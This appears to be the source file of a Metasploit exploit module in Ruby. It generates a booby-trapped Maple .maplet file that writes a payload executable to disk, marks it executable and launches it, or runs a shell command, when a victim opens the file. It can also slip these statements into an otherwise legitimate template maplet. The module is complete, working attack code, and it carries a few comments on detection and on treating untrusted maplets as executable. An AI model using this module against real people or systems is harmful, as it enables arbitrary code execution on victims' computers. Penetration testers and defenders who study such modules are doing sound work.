Path: blob/master/modules/exploits/multi/fileformat/maple_maplet.rb
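##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# File-format module that builds a Maple .maplet file whose leading script
# statements run when the file is opened in Maple.
#
# Per the module description, Maple's standard security settings gate code in
# a normal worksheet behind user interaction but do not gate code in a Maplet,
# and all versions up to 13 are suspected vulnerable (tested on 13, Windows).
# The practical control is therefore on the receiving side: treat .maplet
# files from untrusted sources as executable content.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  # Registers module metadata, the supported targets and the two datastore
  # options (TEMPLATE, FILENAME).
  #
  # info - Hash of metadata overrides merged in through update_info.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Maple Maplet File Creation and Command Execution',
        'Description' => %q{
          This module harnesses Maple's ability to create files and execute commands
          automatically when opening a Maplet. All versions up to 13 are suspected
          vulnerable. Testing was conducted with version 13 on Windows. Standard security
          settings prevent code from running in a normal maple worksheet without user
          interaction, but those setting do not prevent code in a Maplet from running.

          In order for the payload to be executed, an attacker must convince someone to
          open a specially modified .maplet file with Maple. By doing so, an attacker can
          execute arbitrary code as the victim user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'scriptjunkie'
        ],
        'References' => [
          [ 'OSVDB', '64541'],
          [ 'URL', 'http://www.maplesoft.com/products/maple/' ]
        ],
        'Payload' => {
          'Space' => 1024,
          'BadChars' => '',
          'DisableNops' => true,
          # 'Compat' =>
          # {
          # 'PayloadType' => 'cmd',
          # 'RequiredCmd' => 'generic perl telnet',
          # }
        },
        'Platform' => %w{win linux unix},
        'Targets' => [
          [
            'Windows',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],

          [
            'Windows X64',
            {
              'Arch' => ARCH_X64,
              'Platform' => 'win'
            }
          ],

          [
            'Linux',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ],

          [
            'Linux X64',
            {
              'Arch' => ARCH_X64,
              'Platform' => 'linux'
            }
          ],

          [
            'Universal CMD',
            {
              'Arch' => ARCH_CMD,
              'Platform' => %w{linux unix win}
            }
          ]

        ],
        'DisclosureDate' => '2010-04-26',
        'DefaultTarget' => 0,
        # NOTE(review): all three values are still UNKNOWN. For the executable
        # targets the generated script writes a file to disk before launching
        # it, so ARTIFACTS_ON_DISK looks like a candidate side effect -
        # confirm against a test run before recording it.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TEMPLATE', [ false, 'The file to infect.', '']),
        OptString.new('FILENAME', [ true, 'The output file.', 'msf.maplet']),
      ]
    )
  end

  # Builds the Maplet script text and writes it out through file_create.
  #
  # Shape of the output, which is also what a content filter or an analyst
  # triaging a suspicious .maplet would look for:
  #
  # * Executable targets: an fopen(..., WRITE, BINARY) call on a random
  #   3-17 letter file name (".exe" appended on Windows), runs of
  #   writebytes(...) holding 100 decimal byte values each, an fclose(...),
  #   a chmod a+x via system(...) on non-Windows platforms, and finally a
  #   system[launch](...) on the written file. The file name carries no
  #   directory component, so where it lands depends on how Maple resolves
  #   relative paths - not determinable from this module.
  # * ARCH_CMD target: a single system("...") statement.
  #
  # In both cases the statements are placed ahead of the TEMPLATE contents,
  # so an otherwise legitimate maplet can carry them at the top of the file.
  def exploit
    content = ''
    if target['Arch'] != ARCH_CMD
      # Get payload as executable on whatever platform
      binary = generate_payload_exe

      # Get filename and random variable name for file handle in script
      fname = rand_text_alpha(3 + rand(15))
      fname << ".exe" if target['Platform'] == 'win'
      fhandle = rand_text_alpha(3 + rand(15))

      # Write maple commands to create executable
      content << "#{fhandle} := fopen(\"#{fname}\",WRITE,BINARY);\n"
      exe = binary.unpack('C*')

      content << "writebytes(#{fhandle},[#{exe[0]}"
      lines = []
      # idx is a position in exe, not a byte value; every 100th position
      # closes the current writebytes call and opens a new one.
      1.upto(exe.length - 1) do |idx|
        if (idx % 100).zero?
          lines.push "]);\r\nwritebytes(#{fhandle},[#{exe[idx]}"
        else
          lines.push ",#{exe[idx]}"
        end
      end
      content << lines.join << "]);\r\n"

      content << "fclose(#{fhandle});\n"
      # Write command to be executed
      if target['Platform'] != 'win'
        content << "system(\"chmod a+x #{fname}\");\n"
      end
      content << "system[launch](\"#{fname}\");\n"
    else
      content << "system(\"#{payload.encoded}\");\n"
    end

    # Then put the rest of the original maplet. to_s covers an unset (nil)
    # option, which the original `!= ''` test let through to File.open.
    template = datastore['TEMPLATE'].to_s
    content << File.binread(template) unless template.empty?

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create(content)
  end
end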